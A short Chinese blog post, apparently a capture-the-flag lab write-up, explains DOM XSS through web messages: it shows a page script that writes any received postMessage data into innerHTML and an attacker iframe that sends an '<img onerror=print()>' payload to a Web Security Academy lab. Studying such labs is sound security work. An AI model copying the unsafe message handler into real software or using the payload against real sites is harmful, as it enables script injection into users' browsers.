当前位置: 首页 > news >正文

CTF-WEB: 利用Web消息造成DOM XSS

news 来源:原创 2025/5/17 11:39:48

如果索引中有类似如下代码

<!-- Ads to be inserted here -->
<div id='ads'>
</div>
<script>
    window.addEventListener('message', function(e) {
        document.getElementById('ads').innerHTML = e.data;
    });
</script>
  • 这行代码的作用是将接收到的消息内容(e.data)设置为 id'ads' 的元素的 HTML 内容

那么在受害者段执行如下代码会导致DOM污染

<iframe src="https://YOUR-LAB-ID.web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=print()>','*')">

参考

实验:使用 Web 消息的 DOM XSS |网络安全学院

相关文章:

  • DeepSeek接口联调(postman版)
  • 使用pocketpal-ai在手机上搭建本地AI聊天环境
  • 使用spring-web 和 不是用spring-web各自的最小依赖
  • 3d pose 学习笔记2025
  • vscode无法ssh连接远程机器解决方案
  • 大模型chagpt原理(持续更新)
  • 新数据结构(4)——Java继承
  • springboot配置https
  • 【Prometheus】prometheus结合cAdvisor监控docker容器运行状态,并且实现实时告警通知
  • 编码格式大全解释以及相关编码特性
  • Spring Boot整合DeepSeek实现AI对话(API调用和本地部署)
  • DeepSeek-R1技术革命:用强化学习重塑大语言模型的推理能力
  • 10. Hbase Compaction命令
  • webpack配置之---output.publicPath
  • 机器翻译同样的文本,是从英语翻译成日语更准确还是中文翻译成日语更准确
  • 语言大模型基础概念 一(先了解听说过的名词都是什么)
  • [Redis] Redis分布式锁与常见面试题
  • x64、aarch64、arm与RISC-V64:详解四种处理器架构
  • 2024年博客之星年度评选—创作影响力评审+主题文章创作评审目前排名(2024博客之星陪跑小分队助力2024博客之星创作者成长)
  • 从云原生到 AI 原生,谈谈我经历的网关发展历程和趋势
  • 俄乌直接谈判结束
  • 中欧互动中的合作与分歧:务实需求将克服泛安全化的“政治钟摆”
  • 商务部召开全国离境退税工作推进会:提高退税商店覆盖面,扩大入境消费
  • 澎湃·镜相第二届非虚构写作大赛初选入围名单公示
  • 美国与卡塔尔签署超2435亿美元经济及军事合作协议
  • 制造四十余年血腥冲突后,库尔德工人党为何自行解散?